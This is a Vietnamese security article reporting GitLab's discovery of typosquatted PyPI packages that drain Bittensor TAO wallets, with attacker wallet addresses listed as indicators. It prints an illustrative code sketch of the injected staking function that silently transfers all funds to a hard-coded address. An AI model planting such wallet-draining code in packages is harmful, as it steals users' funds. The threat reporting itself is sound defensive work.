Cảnh báo: Đánh cắp dữ liệu crypto tinh vi qua PyPI

09/08/2025
4 mins read
Cảnh báo: Đánh cắp dữ liệu crypto tinh vi qua PyPI

Nhóm Nghiên cứu Lỗ hổng của GitLab đã phát hiện một chiến dịch đánh cắp dữ liệu tiền mã hóa cực kỳ tinh vi. Chiến dịch này khai thác các gói Python bị typosquatting trên Python Package Index (PyPI) nhằm vào mạng lưới AI phi tập trung Bittensor.

Hoạt động này, được phát hiện thông qua hệ thống giám sát gói tự động của GitLab, liên quan đến việc triển khai các gói độc hại. Các gói này được thiết kế để bắt chước các thành phần Bittensor hợp pháp, chuyên dùng để thực hiện việc đánh cắp dữ liệu quỹ từ nhà phát triển và người dùng trong các hoạt động staking định kỳ.

Nội dung
Phân tích Chiến dịch Tấn công Chuỗi Cung ứng

Các Gói Python Độc Hại Bị Typosquatting
Cơ Chế Khai Thác Kỹ Thuật

Động Cơ Tấn Công và Tâm Lý Nạn Nhân
Phát Hiện Xâm Nhập và Dấu Hiệu Thỏa Hiệp (IOCs)

Địa Chỉ Ví Tấn Công (IOCs)
Chiến Lược Typosquatting
Nâng Cao An Ninh Mạng và Phòng Chống

Phân tích Chiến dịch Tấn công Chuỗi Cung ứng

Cuộc tấn công chuỗi cung ứng này lợi dụng lỗi phổ biến của nhà phát triển trong quá trình cài đặt gói. Các lỗi này bao gồm lỗi chính tả trong lệnh pip, từ đó xâm nhập hệ thống và thực hiện các giao dịch chuyển tiền trái phép trên blockchain Bittensor.

Thời điểm của chiến dịch cho thấy một nỗ lực phối hợp từ các tác nhân đe dọa. Tất cả các gói được tải lên trong vòng 25 phút vào ngày 6 tháng 8 năm 2025, nhằm mục đích tối đa hóa tác động trước khi bị phát hiện.

Các Gói Python Độc Hại Bị Typosquatting

Các gói bị ảnh hưởng bao gồm: [email protected], [email protected], [email protected], [email protected], và [email protected]. Mỗi gói được tạo ra để giống với các thư viện bittensorbittensor-cli chính hãng, vốn cần thiết để tương tác với giao thức đào tạo AI ngang hàng của Bittensor.

Bằng cách khai thác những điểm tương đồng về tên, kẻ tấn công đảm bảo rằng việc cài đặt vô ý sẽ dẫn đến sự thỏa hiệp của các ví tiền mã hóa có giá trị cao. Điều này làm nổi bật các lỗ hổng dai dẳng trong hệ sinh thái phần mềm mã nguồn mở và nguy cơ đánh cắp dữ liệu.

Cơ Chế Khai Thác Kỹ Thuật

Sự tinh vi về mặt kỹ thuật của cuộc tấn công nằm ở việc thao túng chức năng cốt lõi trong Bittensor CLI.

Cụ thể, các gói độc hại đã sửa đổi hàm stake_extrinsic trong module bittensor_cli/src/commands/stake/add.py. Mã độc được chèn vào dòng 275, chuyển hướng các hoạt động staking thành một cuộc rút cạn ví hoàn toàn.

Thay vì thực hiện một lệnh extrinsic tiêu chuẩn để khóa token cho việc xác thực mạng và kiếm thưởng, hàm bị chiếm quyền đã gọi một transfer_extrinsic. Các tham số được thiết lập là transfer_all=True, prompt=False, và một địa chỉ đích được mã hóa cứng.

Địa chỉ đích được mã hóa cứng là 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR. Điều này dẫn đến việc âm thầm đánh cắp dữ liệu tất cả các token TAO (tiền mã hóa gốc của Bittensor) mà không cần yêu cầu xác nhận hay thông báo từ người dùng, ngụy trang như một hoạt động blockchain hợp pháp.

# Đoạn mã mô phỏng sự thay đổi trong bittensor_cli/src/commands/stake/add.py
# (Đây là mã minh họa, không phải mã thực tế từ nguồn)

# Mã gốc (giả định):
# def stake_extrinsic(subtensor, wallet, amount):
#     # ... logic to stake amount ...
#     pass

# Mã độc sau khi bị sửa đổi tại dòng 275:
# def stake_extrinsic(subtensor, wallet, amount):
#     # ... original logic ...
#     # Injected malicious code:
#     destination_address = "5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR"
#     subtensor.transfer_extrinsic(
#         wallet=wallet,
#         dest=destination_address,
#         amount=0, # Hoặc một giá trị khác biểu thị chuyển tất cả
#         transfer_all=True,
#         prompt=False
#     )
#     # ... original logic continues, but funds are already drained ...
#     pass

Động Cơ Tấn Công và Tâm Lý Nạn Nhân

Việc nhắm mục tiêu vào hoạt động staking là một chiến lược hợp lý từ góc độ của tác nhân đe dọa. Staking yêu cầu mở khóa ví và xác thực, cung cấp các quyền cần thiết để chuyển hướng quỹ. Trong khi đó, người dùng có số lượng tài sản lớn thường tham gia các hoạt động này để tạo lợi nhuận.

Hơn nữa, bản chất thường xuyên của việc staking trong các mạng lưới Proof-of-Stake tạo ra sự chủ quan cho người dùng. Điều này làm chậm trễ việc phát hiện, vì sự chênh lệch số dư có thể bị nhầm lẫn với phí giao dịch hoặc tạm giữ. Vector tấn công này không chỉ khai thác các giao thức kỹ thuật mà còn cả các mô hình tâm lý trong tương tác blockchain, làm cho nó đặc biệt xảo quyệt đối với những người tham gia Bittensor thường xuyên.

Phát Hiện Xâm Nhập và Dấu Hiệu Thỏa Hiệp (IOCs)

Phân tích pháp y blockchain do GitLab thực hiện đã tiết lộ một kế hoạch rửa tiền nhiều lớp sau các vụ trộm ban đầu. Đây là một ví dụ điển hình về việc phát hiện xâm nhập hiệu quả. Các quỹ bị đánh cắp dữ liệu được chuyển đến ví chính và sau đó được phân tán qua các địa chỉ trung gian, cuối cùng được hợp nhất và rút ra.

Kỹ thuật che giấu này sử dụng các giao dịch nhanh chóng, nhiều bước nhảy để tránh bị theo dõi trên sổ cái công khai. Đây là một chiến thuật phổ biến trong tội phạm tiền mã hóa nhằm ẩn danh các khoản thu bất hợp pháp và che giấu việc đánh cắp dữ liệu.

Địa Chỉ Ví Tấn Công (IOCs)

Các địa chỉ ví liên quan đến chiến dịch đánh cắp dữ liệu này bao gồm:

  • Ví chính và ví đích ban đầu: 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
  • Các địa chỉ trung gian:
    • 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1
    • 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC
    • 5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6
    • 5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
  • Địa chỉ hợp nhất và rút tiền:
    • 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu
    • 5HDo9i9XynX44DFjeoabFqPF2XXmFCkJASC7FxWpbqv6D7QQ

Chiến Lược Typosquatting

Chiến lược typosquatting tiếp tục khuếch đại mối đe dọa, dựa vào các biến thể tên tinh vi. Ví dụ như bỏ sót chữ cái (ví dụ: “bitensor” thay vì “bittensor”) hoặc rút gọn (“bittenso”), kết hợp với số phiên bản giống hệt các bản phát hành hợp pháp. Mục tiêu là khai thác lỗi của con người trong quy trình làm việc phát triển, từ đó tạo điều kiện cho việc đánh cắp dữ liệu.

Nâng Cao An Ninh Mạng và Phòng Chống

Sự cố này nhấn mạnh nhu cầu cấp thiết về việc tăng cường các biện pháp phòng thủ chuỗi cung ứng, bao gồm phát hiện bất thường tự động trong các kho gói và giám sát giao dịch blockchain. Để đảm bảo an ninh mạng tốt hơn, các tổ chức cần liên tục cảnh giác.

Việc GitLab chủ động xác định lỗ hổng này minh họa cách nghiên cứu lỗ hổng liên tục có thể giảm thiểu các rủi ro đó. Điều này giúp tăng cường khả năng phục hồi trên các hệ sinh thái tài chính phi tập trung và AI.

Để biết thêm chi tiết về phân tích này, bạn có thể tham khảo bài viết gốc từ GitLab: GitLab Uncovers Bittensor Theft Campaign via PyPI.